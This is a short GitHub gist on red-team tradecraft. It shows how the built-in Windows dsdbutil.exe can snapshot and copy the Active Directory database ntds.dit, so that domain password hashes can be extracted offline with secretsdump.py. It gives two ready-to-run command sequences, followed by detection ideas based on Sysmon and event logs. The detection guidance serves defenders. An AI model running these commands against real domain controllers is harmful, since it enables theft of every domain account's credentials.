Skip to content

Instantly share code, notes, and snippets.

@bohops
Last active February 21, 2023 14:29
Show Gist options
  • Save bohops/88561ca40998e83deb3d1da90289e358 to your computer and use it in GitHub Desktop.
Save bohops/88561ca40998e83deb3d1da90289e358 to your computer and use it in GitHub Desktop.
yet another native AD database extraction utility
DSDButil
========
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
- Example #2: Living dangerously with (assumed) snapshot identifier
dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
*dsdbutil also supports an interactive mode, which is likely more stable than the examples above.
===========================
*Defensive Considerations
I chatted with @SBousseaden about a few Sysmon detection strategies. Here are a few ideas:
- CMDline logging is interesting - dsdbutil can run a string of commands (i.e. as demonstrated above)
or interactively (to hide actual commands)
- Although a bit combersome, "Service Control Manager" source for VSS will be logged as System Event ID 7036 with
a description of "The Microsoft Software Shadow Copy Provider service entered the running state."
- If a volume is mounted,a "NTFS" source will be logged as System Event ID 98 with a description highlighting
the Volume Shadow Copy ID such as "Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy. No action is needed."
- With a mount operation, dsdbuil mounts the snapshot at the logical drive root with a prefix
of "$SNAP_" (e.g. C:\$SNAP_201906250551_VOLUMEC$\). This has utility for monitoring interesting "Image Names"
or paths for Sysmont events (e.g. FileCreate, Execute, etc.).
- And of course, Sysmon Events that contain "HarddiskVolumeShadowCopy" within the Image and Cmdline fields are always interesting as well
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment